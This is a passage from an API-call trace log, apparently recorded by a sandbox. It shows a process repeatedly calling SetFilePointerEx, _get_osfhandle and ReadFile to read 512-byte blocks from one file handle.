liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.231] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.231] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.231] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.231] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.231] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.231] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.231] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.231] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.231] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.231] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.231] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.231] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.231] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.231] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.231] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.231] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.231] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.231] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.231] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.231] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.231] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.232] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.232] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.232] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.232] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.232] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.232] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.232] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.232] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.232] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.232] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.232] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.232] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.232] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.232] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.232] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.232] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.232] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.232] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.232] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.232] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.232] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.233] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.233] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.233] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.233] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.233] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.233] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.233] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.233] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.233] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.233] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.233] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.233] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.233] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.233] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.233] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.233] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.233] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.234] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.234] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.234] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.234] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.234] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.234] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.234] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.234] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.234] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.234] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.234] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.234] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.234] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.234] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.234] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.234] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.234] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.234] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.234] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.234] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.234] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.235] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.235] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.235] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.235] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.235] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.235] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.235] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.235] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.235] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.235] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.235] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.235] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.235] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.235] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.235] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.235] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.235] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.235] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.235] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.236] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.236] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.236] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.236] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.236] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.236] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.236] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.236] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.236] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.236] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.236] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.236] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.236] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.236] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.236] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.236] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.236] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.236] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.237] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.237] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.237] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.237] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.237] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.237] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.237] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.237] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.237] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.237] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.237] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.237] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.237] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.237] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.237] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.237] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.237] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.237] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.237] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.237] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.237] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.237] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.238] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.238] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.238] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.238] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.238] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.238] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.238] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.238] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.238] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.238] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.238] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.238] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.238] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.238] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.238] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.238] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.238] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.238] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.238] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.238] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.238] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.238] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.239] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.239] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.239] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.239] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.239] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.239] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.239] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.239] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.239] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.239] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 